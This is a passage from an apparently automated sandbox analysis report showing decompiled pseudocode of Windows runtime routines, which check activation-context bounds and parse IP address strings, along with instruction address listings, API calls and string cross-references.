                                                                                                                            • String ID: RtlpCrackActivationContextStringSectionHeader$SXS: %s() found assembly information section with element list overlapping section header Section header: %p Header Size: %lu ElementListOffset: %lu$SXS: %s() found assembly information section with search structure overlapping section header Section header: %p Header Size: %lu SearchStructureOffset: %lu$SXS: %s() found assembly information section with user data extending beyond section data Section header: %p UserDataSize: %lu UserDataOffset: %lu Section size: %Iu$SXS: %s() found assembly information section with user data overlapping section header Section header: %p Header Size: %lu User Data Offset: %lu$SXS: %s() found assembly information section with user data too small Section header: %p UserDataSize: %lu; needed: %lu$SXS: %s() found assembly information section with wrong magic value Expected %lu; got %lu$SXS: %s() passed string section at %p claims %lu byte header size; that doesn't even include the HeaderSize member!$SXS: %s() passed string section at %p only %Iu bytes long; that's not even enough for the 4-byte magic and 4-byte header length!$SXS: %s() passed string section at %p with too small of a header HeaderSize: %lu Required: %lu$SsHd
                                                                                                                            • API String ID: 0-1525761513
                                                                                                                            • Opcode ID: 0d042a1e7d94688519058bb5325e49f4879a9e1e2a46affae7768b647a879eaa
                                                                                                                            • Instruction ID: 3c003be135c114f75fcefc3b09fa7319cd3cefd4c3dea2c8c7b5893f88013cfd
                                                                                                                            • Opcode Fuzzy Hash: 0d042a1e7d94688519058bb5325e49f4879a9e1e2a46affae7768b647a879eaa
                                                                                                                            • Instruction Fuzzy Hash: A741B5F1650219BFA7248F08CCC9D6777AEFBA9B49720815DB404EA101E33DEE528772
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1F31F0, Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 248COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 65%
                                                                                                                            			E6B1F31F0(void* __ecx, void __edx, void* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				signed int _v12;
				void _v28;
				signed int _v32;
				void _v36;
				int _v40;
				void _v44;
				intOrPtr _v48;
				void _v52;
				intOrPtr* _v56;
				intOrPtr* _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t80;
				void* _t85;
				intOrPtr _t86;
				void* _t90;
				signed int _t91;
				signed int _t95;
				signed int _t96;
				int _t97;
				void* _t99;
				intOrPtr _t100;
				signed int _t106;
				int _t110;
				void _t120;
				void* _t125;
				signed char _t126;
				void* _t127;
				intOrPtr _t128;
				void* _t135;
				void* _t136;
				intOrPtr _t137;
				signed int _t139;
				void* _t140;
				signed int _t152;

				_t132 = __edx;
				_v12 =  *0x6b2cd360 ^ _t139;
				_t135 = __ecx;
				_t136 = 0;
				_v56 = _a8;
				_t110 =  *(__ecx + 0xc);
				_v52 = __edx;
				_v60 = _a12;
				_v40 = _t110;
				if(_t110 < 0x20 ||  *((intOrPtr*)(__ecx + 4)) < 0x20) {
					_push( *((intOrPtr*)(_t135 + 4)));
					_push(_t110);
					_push(_t135);
					_push("SXS/RTL: Activation context data at %p too small; TotalSize = %lu; HeaderSize = %lu\n");
					goto L50;
				} else {
					if(__edx != 0) {
						_t82 =  *((intOrPtr*)(__ecx + 0x14));
						if( *((intOrPtr*)(__ecx + 0x14)) == 0) {
							goto L25;
						} else {
							_t132 = 1;
							_t85 = E6B26444F(_t82, 1, 0x10, _t110);
							_t86 =  *((intOrPtr*)(_t135 + 0x14));
							_push(_t110);
							if(_t85 != 0) {
								_t120 =  *(_t86 + _t135 + 4);
								_t132 = _t120;
								_v44 = _t120;
								_push(0x18);
								_v32 =  *((intOrPtr*)(_t86 + _t135 + 8));
								if(E6B26444F( *((intOrPtr*)(_t86 + _t135 + 8)), _t120) != 0) {
									_t123 = _v32 + _t135;
									_v32 = 0;
									_v48 = _t123;
									if(_v44 <= 0) {
										goto L25;
									} else {
										_t110 = _v52;
										_v36 = _t123;
										while(1) {
											_t90 = E6B21F380(_t110, _t123, 0x10);
											_t140 = _t140 + 0xc;
											_t91 = _v32;
											if(_t90 == 0) {
												break;
											}
											_t106 = _t91 + 1;
											_t123 = _v36 + 0x18;
											_v32 = _t106;
											_v36 = _v36 + 0x18;
											if(_t106 < _v44) {
												continue;
											} else {
												goto L25;
											}
											goto L52;
										}
										_t132 = 1;
										_t110 =  *(_v48 + 0x10 + (_t91 + _t91 * 2) * 8);
										if(E6B26444F(_t110, 1, 0x10,  *(_t135 + 0xc)) != 0) {
											goto L4;
										} else {
											_push(_v40);
											_push(0x10);
											_push(_t110);
											E6B265720(0x33, 0, "SXS/RTL: Extended TOC section TOC %d (offset: %ld, size: %u) is outside activation context data bounds (%lu bytes)\n", _v32);
											goto L51;
										}
									}
								} else {
									_push(_t110);
									_push(0x18);
									_push(_v44);
									E6B265720(0x33, 0, "SXS/RTL: Extended TOC entry array (starting at offset %ld; count = %lu; entry size = %u) is outside bounds of activation context data (%lu bytes)\n", _v32);
									goto L51;
								}
							} else {
								E6B265720(0x33, 0, "SXS/RTL: Extended TOC offset (%ld) is outside bounds of activation context data (%lu bytes)\n", _t86);
								goto L51;
							}
						}
					} else {
						_t110 =  *(__ecx + 0x10);
						if(_t110 == 0) {
							L25:
							return E6B21B640(0xc0150001, _t110, _v12 ^ _t139, _t132, _t135, _t136);
						} else {
							L4:
							_t125 = _t135 + _t110;
							if(_t125 == 0) {
								goto L25;
							} else {
								_t110 =  *(_t125 + 4);
								if(_t110 == 0) {
									goto L25;
								} else {
									_v36 =  *(_t125 + 8);
									_t95 = _t110;
									_t96 = _t95 * 0x10;
									_t152 = _t95 * 0x10 >> 0x20;
									if(_t152 < 0 || _t152 <= 0 && _t96 <= 0xffffffff) {
										_t132 =  *(_t125 + 8);
										_t137 = _t96 + _t132;
										_v48 = _t137;
										_t136 = 0;
										if(_t137 < _t96) {
											goto L47;
										} else {
											_t97 =  *(_t135 + 0xc);
											if(_t132 >= _t97 || _v48 > _t97) {
												goto L48;
											} else {
												_t126 =  *(_t125 + 0xc);
												_t99 = _t132 + _t135;
												if((_t126 & 0x00000002) == 0) {
													_t127 = 0;
													if(_t110 != 0) {
														_t132 = _a4;
														while( *_t99 != _t132) {
															_t127 = _t127 + 1;
															_t99 = _t99 + 0x10;
															if(_t127 < _t110) {
																continue;
															} else {
															}
															goto L17;
														}
														goto L16;
													}
													goto L17;
												} else {
													_t132 =  *_t99;
													_t136 = _a4;
													if(_t136 < _t132) {
														goto L25;
													} else {
														if((_t126 & 0x00000001) != 0) {
															_t136 = _t136 - _t132;
															if(_t136 >= _t110) {
																goto L25;
															} else {
																_t136 = _t99 + (_t136 << 4);
																goto L17;
															}
														} else {
															_v28 = _t136;
															_t99 = bsearch( &_v28, _t99, _t110, 0x10, 0x6b208c30);
															_t140 = _t140 + 0x14;
															L16:
															_t136 = _t99;
															L17:
															if(_t136 == 0) {
																goto L25;
															} else {
																_t100 =  *((intOrPtr*)(_t136 + 4));
																if(_t100 == 0) {
																	goto L25;
																} else {
																	_t128 =  *((intOrPtr*)(_t136 + 8));
																	_t110 =  *(_t135 + 0xc);
																	if(_t128 > 0xffffffff) {
																		L26:
																		_push(_t110);
																		_push(_t128);
																		_push(_t100);
																		_push("SXS/RTL: Section found (offset %ld; length %lu) extends past end of activation context data (%lu bytes)\n");
																		L50:
																		_push(0);
																		_push(0x33);
																		E6B265720();
																		goto L51;
																	} else {
																		_t132 = _t128 + _t100;
																		if(_t132 < _t128 || _t100 >= _t110 || _t132 > _t110) {
																			goto L26;
																		} else {
																			 *_v56 = _t100 + _t135;
																			 *_v60 =  *((intOrPtr*)(_t136 + 8));
																			_t80 = 0;
																		}
																	}
																	goto L24;
																}
															}
														}
													}
												}
											}
										}
									} else {
										_t132 = _v36;
										L47:
										_t97 = _v40;
										L48:
										_push(_t97);
										_push(0x10);
										_push(_t110);
										E6B265720(0x33, 0, "SXS/RTL: TOC entry array (offset: %ld; count = %lu; entry size = %u) is outside bounds of activation context data (%lu bytes)\n", _t132);
										L51:
										_t80 = 0xc0150003;
										L24:
										return E6B21B640(_t80, _t110, _v12 ^ _t139, _t132, _t135, _t136);
									}
								}
							}
						}
					}
				}
				L52:
			}







































                                                                                                                            0x6b1f31f0
                                                                                                                            0x6b1f31ff
                                                                                                                            0x6b1f3205
                                                                                                                            0x6b1f320c
                                                                                                                            0x6b1f320e
                                                                                                                            0x6b1f3214
                                                                                                                            0x6b1f3217
                                                                                                                            0x6b1f321a
                                                                                                                            0x6b1f321d
                                                                                                                            0x6b1f3223
                                                                                                                            0x6b23d974
                                                                                                                            0x6b23d977
                                                                                                                            0x6b23d978
                                                                                                                            0x6b23d979
                                                                                                                            0x00000000
                                                                                                                            0x6b1f3233
                                                                                                                            0x6b1f3235
                                                                                                                            0x6b23d824
                                                                                                                            0x6b23d829
                                                                                                                            0x00000000
                                                                                                                            0x6b23d82f
                                                                                                                            0x6b23d832
                                                                                                                            0x6b23d839
                                                                                                                            0x6b23d840
                                                                                                                            0x6b23d843
                                                                                                                            0x6b23d844
                                                                                                                            0x6b23d85d
                                                                                                                            0x6b23d861
                                                                                                                            0x6b23d867
                                                                                                                            0x6b23d86c
                                                                                                                            0x6b23d86e
                                                                                                                            0x6b23d878
                                                                                                                            0x6b23d89f
                                                                                                                            0x6b23d8a1
                                                                                                                            0x6b23d8a4
                                                                                                                            0x6b23d8aa
                                                                                                                            0x00000000
                                                                                                                            0x6b23d8b0
                                                                                                                            0x6b23d8b0
                                                                                                                            0x6b23d8b3
                                                                                                                            0x6b23d8b6
                                                                                                                            0x6b23d8ba
                                                                                                                            0x6b23d8bf
                                                                                                                            0x6b23d8c4
                                                                                                                            0x6b23d8c7
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b23d8cc
                                                                                                                            0x6b23d8cd
                                                                                                                            0x6b23d8d0
                                                                                                                            0x6b23d8d3
                                                                                                                            0x6b23d8d9
                                                                                                                            0x00000000
                                                                                                                            0x6b23d8db
                                                                                                                            0x00000000
                                                                                                                            0x6b23d8db
                                                                                                                            0x00000000
                                                                                                                            0x6b23d8d9
                                                                                                                            0x6b23d8e9
                                                                                                                            0x6b23d8f0
                                                                                                                            0x6b23d8fd
                                                                                                                            0x00000000
                                                                                                                            0x6b23d903
                                                                                                                            0x6b23d903
                                                                                                                            0x6b23d909
                                                                                                                            0x6b23d90b
                                                                                                                            0x6b23d916
                                                                                                                            0x00000000
                                                                                                                            0x6b23d91b
                                                                                                                            0x6b23d8fd
                                                                                                                            0x6b23d87a
                                                                                                                            0x6b23d87d
                                                                                                                            0x6b23d87e
                                                                                                                            0x6b23d880
                                                                                                                            0x6b23d88d
                                                                                                                            0x00000000
                                                                                                                            0x6b23d892
                                                                                                                            0x6b23d846
                                                                                                                            0x6b23d850
                                                                                                                            0x00000000
                                                                                                                            0x6b23d855
                                                                                                                            0x6b23d844
                                                                                                                            0x6b1f323b
                                                                                                                            0x6b1f323b
                                                                                                                            0x6b1f3240
                                                                                                                            0x6b1f332c
                                                                                                                            0x6b1f3341
                                                                                                                            0x6b1f3246
                                                                                                                            0x6b1f3246
                                                                                                                            0x6b1f3246
                                                                                                                            0x6b1f324b
                                                                                                                            0x00000000
                                                                                                                            0x6b1f3251
                                                                                                                            0x6b1f3251
                                                                                                                            0x6b1f3256
                                                                                                                            0x00000000
                                                                                                                            0x6b1f325c
                                                                                                                            0x6b1f3264
                                                                                                                            0x6b1f3267
                                                                                                                            0x6b1f3269
                                                                                                                            0x6b1f326b
                                                                                                                            0x6b1f326d
                                                                                                                            0x6b1f327e
                                                                                                                            0x6b1f3281
                                                                                                                            0x6b1f3284
                                                                                                                            0x6b1f3289
                                                                                                                            0x6b1f328e
                                                                                                                            0x00000000
                                                                                                                            0x6b1f3294
                                                                                                                            0x6b1f3294
                                                                                                                            0x6b1f3299
                                                                                                                            0x00000000
                                                                                                                            0x6b1f32a8
                                                                                                                            0x6b1f32a8
                                                                                                                            0x6b1f32ab
                                                                                                                            0x6b1f32b1
                                                                                                                            0x6b23d934
                                                                                                                            0x6b23d938
                                                                                                                            0x6b23d93e
                                                                                                                            0x6b23d941
                                                                                                                            0x6b23d949
                                                                                                                            0x6b23d94a
                                                                                                                            0x6b23d94f
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b23d951
                                                                                                                            0x00000000
                                                                                                                            0x6b23d94f
                                                                                                                            0x00000000
                                                                                                                            0x6b23d941
                                                                                                                            0x00000000
                                                                                                                            0x6b1f32b7
                                                                                                                            0x6b1f32b7
                                                                                                                            0x6b1f32b9
                                                                                                                            0x6b1f32be
                                                                                                                            0x00000000
                                                                                                                            0x6b1f32c0
                                                                                                                            0x6b1f32c3
                                                                                                                            0x6b23d920
                                                                                                                            0x6b23d924
                                                                                                                            0x00000000
                                                                                                                            0x6b23d92a
                                                                                                                            0x6b23d92d
                                                                                                                            0x00000000
                                                                                                                            0x6b23d92d
                                                                                                                            0x6b1f32c9
                                                                                                                            0x6b1f32d5
                                                                                                                            0x6b1f32d9
                                                                                                                            0x6b1f32de
                                                                                                                            0x6b1f32e1
                                                                                                                            0x6b1f32e1
                                                                                                                            0x6b1f32e3
                                                                                                                            0x6b1f32e5
                                                                                                                            0x00000000
                                                                                                                            0x6b1f32e7
                                                                                                                            0x6b1f32e7
                                                                                                                            0x6b1f32ec
                                                                                                                            0x00000000
                                                                                                                            0x6b1f32ee
                                                                                                                            0x6b1f32ee
                                                                                                                            0x6b1f32f1
                                                                                                                            0x6b1f32f7
                                                                                                                            0x6b1f3344
                                                                                                                            0x6b1f3344
                                                                                                                            0x6b1f3345
                                                                                                                            0x6b1f3346
                                                                                                                            0x6b1f3347
                                                                                                                            0x6b23d97e
                                                                                                                            0x6b23d97e
                                                                                                                            0x6b23d980
                                                                                                                            0x6b23d982
                                                                                                                            0x00000000
                                                                                                                            0x6b1f32f9
                                                                                                                            0x6b1f32f9
                                                                                                                            0x6b1f32fe
                                                                                                                            0x00000000
                                                                                                                            0x6b1f3308
                                                                                                                            0x6b1f330d
                                                                                                                            0x6b1f3315
                                                                                                                            0x6b1f3317
                                                                                                                            0x6b1f3317
                                                                                                                            0x6b1f32fe
                                                                                                                            0x00000000
                                                                                                                            0x6b1f32f7
                                                                                                                            0x6b1f32ec
                                                                                                                            0x6b1f32e5
                                                                                                                            0x6b1f32c3
                                                                                                                            0x6b1f32be
                                                                                                                            0x6b1f32b1
                                                                                                                            0x6b1f3299
                                                                                                                            0x6b23d956
                                                                                                                            0x6b23d956
                                                                                                                            0x6b23d959
                                                                                                                            0x6b23d959
                                                                                                                            0x6b23d95c
                                                                                                                            0x6b23d95c
                                                                                                                            0x6b23d95d
                                                                                                                            0x6b23d95f
                                                                                                                            0x6b23d96a
                                                                                                                            0x6b23d98a
                                                                                                                            0x6b23d98a
                                                                                                                            0x6b1f331c
                                                                                                                            0x6b1f3329
                                                                                                                            0x6b1f3329
                                                                                                                            0x6b1f326d
                                                                                                                            0x6b1f3256
                                                                                                                            0x6b1f324b
                                                                                                                            0x6b1f3240
                                                                                                                            0x6b1f3235
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • bsearch.1105(00000001,?,00000020,00000010,6B208C30,00000010,?,C00000E5,00000000,00000030,?,6B1D8D70,00000000,?,?,00000030), ref: 6B1F32D9
                                                                                                                            • DbgPrintEx.1105(00000033,00000000,SXS/RTL: Extended TOC offset (%ld) is outside bounds of activation context data (%lu bytes),?,?,00000010,?,C00000E5,00000000,00000030,?,6B1D8D70,00000000,?,?,00000030), ref: 6B23D850
                                                                                                                            • DbgPrintEx.1105(00000033,00000000,SXS/RTL: TOC entry array (offset: %ld; count = %lu; entry size = %u) is outside bounds of activation context data (%lu bytes),?,00000020,00000010,00000030,00000010,?,C00000E5,00000000,00000030,?,6B1D8D70,00000000,?), ref: 6B23D96A
                                                                                                                            • DbgPrintEx.1105(00000033,00000000,SXS/RTL: Activation context data at %p too small; TotalSize = %lu; HeaderSize = %lu,00000001,?,?,C00000E5,00000000,00000030,?,6B1D8D70,00000000,?,?,00000030,?), ref: 6B23D982
                                                                                                                            Strings
                                                                                                                            • SXS/RTL: TOC entry array (offset: %ld; count = %lu; entry size = %u) is outside bounds of activation context data (%lu bytes), xrefs: 6B23D961
                                                                                                                            • SXS/RTL: Extended TOC offset (%ld) is outside bounds of activation context data (%lu bytes), xrefs: 6B23D847
                                                                                                                            • SXS/RTL: Extended TOC entry array (starting at offset %ld; count = %lu; entry size = %u) is outside bounds of activation context data (%lu bytes), xrefs: 6B23D884
                                                                                                                            • SXS/RTL: Section found (offset %ld; length %lu) extends past end of activation context data (%lu bytes), xrefs: 6B1F3347
                                                                                                                            • SXS/RTL: Activation context data at %p too small; TotalSize = %lu; HeaderSize = %lu, xrefs: 6B23D979
                                                                                                                            • SXS/RTL: Extended TOC section TOC %d (offset: %ld, size: %u) is outside activation context data bounds (%lu bytes), xrefs: 6B23D90D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Print$bsearch
                                                                                                                            • String ID: SXS/RTL: Activation context data at %p too small; TotalSize = %lu; HeaderSize = %lu$SXS/RTL: Extended TOC entry array (starting at offset %ld; count = %lu; entry size = %u) is outside bounds of activation context data (%lu bytes)$SXS/RTL: Extended TOC offset (%ld) is outside bounds of activation context data (%lu bytes)$SXS/RTL: Extended TOC section TOC %d (offset: %ld, size: %u) is outside activation context data bounds (%lu bytes)$SXS/RTL: Section found (offset %ld; length %lu) extends past end of activation context data (%lu bytes)$SXS/RTL: TOC entry array (offset: %ld; count = %lu; entry size = %u) is outside bounds of activation context data (%lu bytes)
                                                                                                                            • API String ID: 3813682011-732641482
                                                                                                                            • Opcode ID: 916af8fd6e8fefdebe607db0dd2a6dc61037cac6421de9167e2caa41f110a42d
                                                                                                                            • Instruction ID: a6c793f9e7025c4097ac60c69f17435cfc1b09a83f07e41dc243a58914e16442
                                                                                                                            • Opcode Fuzzy Hash: 916af8fd6e8fefdebe607db0dd2a6dc61037cac6421de9167e2caa41f110a42d
                                                                                                                            • Instruction Fuzzy Hash: A281F8B0E4021DAFEB10CE68D8D1FAEB3F9EB58744F004169E915A7281D739E942CB61
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D6D10, Relevance: 21.3, APIs: 14, Instructions: 316stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 96%
                                                                                                                            			E6B1D6D10(char* _a4, intOrPtr* _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int _v16;
				char** _v20;
				signed int _v24;
				signed int _v28;
				char* _v32;
				signed int _t97;
				char** _t99;
				void* _t108;
				long _t115;
				void* _t118;
				char* _t120;
				char** _t121;
				long _t122;
				long _t123;
				signed int _t124;
				void* _t127;
				void* _t132;
				char* _t134;
				char** _t137;
				intOrPtr _t141;
				intOrPtr _t142;
				signed int _t143;
				char _t146;
				signed int _t151;
				char* _t153;
				intOrPtr* _t155;
				void* _t156;
				void* _t157;
				void* _t161;
				void* _t162;
				char** _t170;
				intOrPtr _t172;
				intOrPtr _t173;
				intOrPtr _t175;
				intOrPtr _t177;
				signed int _t179;
				signed int _t180;
				void* _t182;
				void* _t189;

				_t97 = 0;
				_v32 = 0;
				_t170 = 0;
				_v5 = 0;
				_t180 = 0;
				_v28 = 0;
				_t143 = 0;
				_v24 = 0;
				_t179 = 0;
				_v20 = 0;
				_v12 = 0;
				_v16 = 0;
				_t141 =  *_a4;
				while(_t141 != 0) {
					_t117 = _t97;
					if(_t117 != 0) {
						_t118 = _t117 - 1;
						if(_t118 != 0) {
							_t117 = _t118 == 1;
							if(_t118 == 1) {
								goto L3;
							}
							_t121 = _v20;
							_t177 = _v24;
							L27:
							if(_t177 != 1) {
								L32:
								_t142 = _a12;
								L52:
								_t153 = _v32;
								_t180 = _v12;
								if(_t153 == 0) {
									goto L28;
								}
								if(_t121 != 0) {
									if(_t180 > 3) {
										L14:
										return 0xc000000d;
									}
									_t122 = strtol(_t153, 0, 0xa);
									_t189 = _t189 + 0xc;
									if(_t122 > 0xff) {
										goto L14;
									}
									_t170 = _v20;
									 *(_t170 + _v28 * 2 + _t142 - 1) = _t122;
									L29:
									_t97 = _v24;
									L30:
									_t155 = _a4 + 1;
									_a4 = _t155;
									_t141 =  *_t155;
									_t143 = _v16;
									continue;
								}
								if(_t180 > 4) {
									goto L14;
								}
								_t123 = strtol(_t153, _t121, 0x10);
								_t189 = _t189 + 0xc;
								_t124 = _v28;
								 *((short*)(_t142 + _t124 * 2)) = _t123;
								_v28 = _t124 + 1;
							}
							L28:
							_t170 = _v20;
							goto L29;
						}
						_t185 = _t141;
						_t131 = E6B21CB30(_t118, _t141);
						_pop(_t161);
						if(_t131 == 0 || E6B21CC80(_t161, _t185) == 0) {
							_t132 = E6B21CB30(_t131, _t185);
							_pop(_t162);
							if(_t132 == 0 || E6B21CDD0(_t162, _t185) == 0) {
								if(_t141 == 0x3a) {
									if(_v20 != 0 || _t179 > 6) {
										L9:
										_t143 = _v16;
										goto L10;
									} else {
										_t134 = _a4 + 1;
										if( *_t134 != 0x3a) {
											_t177 = 0;
											L43:
											_t180 = _v12;
											_t179 = _t179 + 1;
											_t121 = _v20;
											L26:
											_v24 = _t177;
											goto L27;
										}
										_t143 = _v16;
										if(_t143 != 0) {
											L10:
											_t180 = _v12;
											break;
										}
										_t177 = 2;
										_t37 = _t179 + 1; // 0x1
										_a4 = _t134;
										_push(_t177);
										_v16 = _t37;
										_pop(1);
										goto L43;
									}
								}
								if(_t141 != 0x2e) {
									goto L9;
								}
								if(_v5 != 0) {
									goto L9;
								}
								_t137 = _v20;
								if(_t137 > 2 || _t179 > 6) {
									goto L9;
								} else {
									_t121 = _t137 + 1;
									_v20 = _t121;
									_v24 = 0;
									goto L32;
								}
							} else {
								_t170 = _v20;
								_t180 = _v12 + 1;
								_v12 = _t180;
								if(_t170 != 0) {
									_t143 = _v16;
									break;
								}
								_v5 = 1;
								goto L29;
							}
						} else {
							_t180 = _v12 + 1;
							_v12 = _t180;
							goto L28;
						}
					}
					L3:
					if(_t141 == 0x3a) {
						if(_t170 != 0 || _t179 != 0) {
							break;
						} else {
							_t120 = _a4 + 1;
							if( *_t120 != 0x3a) {
								break;
							}
							_t142 = _a12;
							_a4 = _t120;
							_t121 = _v20;
							_v16 = 1;
							_t151 = _v28;
							_t179 = 2;
							 *((short*)(_t142 + _t151 * 2)) = _t170;
							_t175 = _t179;
							_v28 = _t151 + 1;
							_v24 = _t175;
							goto L52;
						}
					}
					if(_t179 > 7) {
						break;
					}
					_t183 = _t141;
					_t126 = E6B21CB30(_t117, _t141);
					_pop(_t156);
					if(_t126 == 0 || E6B21CC80(_t156, _t183) == 0) {
						_t127 = E6B21CB30(_t126, _t183);
						_pop(_t157);
						if(_t127 == 0 || E6B21CDD0(_t157, _t183) == 0) {
							goto L9;
						} else {
							_t121 = _v20;
							if(_t121 != 0) {
								goto L9;
							}
							_v5 = 1;
							_t177 = 1;
							_v32 = _a4;
							_t180 = 1;
							_v12 = 1;
							goto L26;
						}
					} else {
						_t170 = _v20;
						_v32 = _a4;
						_t97 = 1;
						_v5 = 0;
						_t180 = 1;
						_v24 = 1;
						_v12 = 1;
						goto L30;
					}
				}
				 *_a8 = _a4;
				_t99 = _v20;
				if(_t99 != 0) {
					if(_t99 != 3) {
						goto L14;
					}
					_t179 = _t179 + 1;
				}
				if(_t143 != 0 || _t179 == 7) {
					_t172 = _v24;
					if(_t172 != 1) {
						if(_t172 != 2) {
							goto L14;
						}
						_t173 = _a12;
						 *((short*)(_t173 + _v28 * 2)) = 0;
						L73:
						if(_t143 != 0) {
							_t182 = _t173 + _t143 * 2;
							memmove(_t173 + (_t143 - _t179 + 8) * 2, _t182, _t179 - _t143 + _t179 - _t143);
							_t108 = 8;
							memset(_t182, 0, _t108 - _t179 + _t108 - _t179);
						}
						return 0;
					}
					if(_t99 != 0) {
						if(_t180 > 3) {
							goto L14;
						}
						_t146 = strtol(_v32, 0, 0xa);
						_t189 = _t189 + 0xc;
						if(_t146 > 0xff) {
							goto L14;
						}
						_t173 = _a12;
						 *((char*)(_v20 + _v28 * 2 + _t173)) = _t146;
						L70:
						_t143 = _v16;
						goto L73;
					}
					if(_t180 > 4) {
						goto L14;
					}
					_t115 = strtol(_v32, _t99, 0x10);
					_t173 = _a12;
					_t189 = _t189 + 0xc;
					 *((short*)(_t173 + _v28 * 2)) = _t115;
					goto L70;
				} else {
					goto L14;
				}
			}












































                                                                                                                            0x6b1d6d1c
                                                                                                                            0x6b1d6d1e
                                                                                                                            0x6b1d6d21
                                                                                                                            0x6b1d6d23
                                                                                                                            0x6b1d6d26
                                                                                                                            0x6b1d6d28
                                                                                                                            0x6b1d6d2b
                                                                                                                            0x6b1d6d2d
                                                                                                                            0x6b1d6d31
                                                                                                                            0x6b1d6d33
                                                                                                                            0x6b1d6d39
                                                                                                                            0x6b1d6d3c
                                                                                                                            0x6b1d6d3f
                                                                                                                            0x6b1d6d41
                                                                                                                            0x6b1d6d45
                                                                                                                            0x6b1d6d48
                                                                                                                            0x6b1d6dc7
                                                                                                                            0x6b1d6dca
                                                                                                                            0x6b231e50
                                                                                                                            0x6b231e53
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b231e59
                                                                                                                            0x6b231e5c
                                                                                                                            0x6b1d6e3b
                                                                                                                            0x6b1d6e3e
                                                                                                                            0x6b1d6e60
                                                                                                                            0x6b1d6e60
                                                                                                                            0x6b231f34
                                                                                                                            0x6b231f34
                                                                                                                            0x6b231f37
                                                                                                                            0x6b231f3c
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b231f44
                                                                                                                            0x6b231f90
                                                                                                                            0x6b1d6db9
                                                                                                                            0x00000000
                                                                                                                            0x6b1d6db9
                                                                                                                            0x6b231f9b
                                                                                                                            0x6b231fa0
                                                                                                                            0x6b231fa8
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b231fae
                                                                                                                            0x6b231fb7
                                                                                                                            0x6b1d6e43
                                                                                                                            0x6b1d6e43
                                                                                                                            0x6b1d6e46
                                                                                                                            0x6b1d6e49
                                                                                                                            0x6b1d6e4a
                                                                                                                            0x6b1d6e4d
                                                                                                                            0x6b1d6e4f
                                                                                                                            0x00000000
                                                                                                                            0x6b1d6e4f
                                                                                                                            0x6b231f49
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b231f53
                                                                                                                            0x6b231f5a
                                                                                                                            0x6b231f5f
                                                                                                                            0x6b231f62
                                                                                                                            0x6b231f67
                                                                                                                            0x6b231f67
                                                                                                                            0x6b1d6e40
                                                                                                                            0x6b1d6e40
                                                                                                                            0x00000000
                                                                                                                            0x6b1d6e40
                                                                                                                            0x6b1d6dd0
                                                                                                                            0x6b1d6dd4
                                                                                                                            0x6b1d6dd9
                                                                                                                            0x6b1d6ddc
                                                                                                                            0x6b1d6dea
                                                                                                                            0x6b1d6def
                                                                                                                            0x6b1d6df2
                                                                                                                            0x6b1d6e06
                                                                                                                            0x6b231e83
                                                                                                                            0x6b1d6d8f
                                                                                                                            0x6b1d6d8f
                                                                                                                            0x00000000
                                                                                                                            0x6b231e92
                                                                                                                            0x6b231e95
                                                                                                                            0x6b231e99
                                                                                                                            0x6b231eb8
                                                                                                                            0x6b231ebb
                                                                                                                            0x6b231ebb
                                                                                                                            0x6b231ebe
                                                                                                                            0x6b231ec0
                                                                                                                            0x6b1d6e38
                                                                                                                            0x6b1d6e38
                                                                                                                            0x00000000
                                                                                                                            0x6b1d6e38
                                                                                                                            0x6b231e9b
                                                                                                                            0x6b231ea0
                                                                                                                            0x6b1d6d92
                                                                                                                            0x6b1d6d92
                                                                                                                            0x00000000
                                                                                                                            0x6b1d6d92
                                                                                                                            0x6b231ea8
                                                                                                                            0x6b231ea9
                                                                                                                            0x6b231eac
                                                                                                                            0x6b231eaf
                                                                                                                            0x6b231eb0
                                                                                                                            0x6b231eb3
                                                                                                                            0x00000000
                                                                                                                            0x6b231eb3
                                                                                                                            0x6b231e83
                                                                                                                            0x6b1d6e0f
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b231ecc
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b231ed2
                                                                                                                            0x6b231ed8
                                                                                                                            0x00000000
                                                                                                                            0x6b231ee7
                                                                                                                            0x6b231ee7
                                                                                                                            0x6b231eea
                                                                                                                            0x6b231eed
                                                                                                                            0x00000000
                                                                                                                            0x6b231eed
                                                                                                                            0x6b231e64
                                                                                                                            0x6b231e67
                                                                                                                            0x6b231e6a
                                                                                                                            0x6b231e6b
                                                                                                                            0x6b231e70
                                                                                                                            0x6b231fc0
                                                                                                                            0x00000000
                                                                                                                            0x6b231fc0
                                                                                                                            0x6b231e76
                                                                                                                            0x00000000
                                                                                                                            0x6b231e76
                                                                                                                            0x6b1d6e57
                                                                                                                            0x6b1d6e5a
                                                                                                                            0x6b1d6e5b
                                                                                                                            0x00000000
                                                                                                                            0x6b1d6e5b
                                                                                                                            0x6b1d6ddc
                                                                                                                            0x6b1d6d4a
                                                                                                                            0x6b1d6d4d
                                                                                                                            0x6b231ef7
                                                                                                                            0x00000000
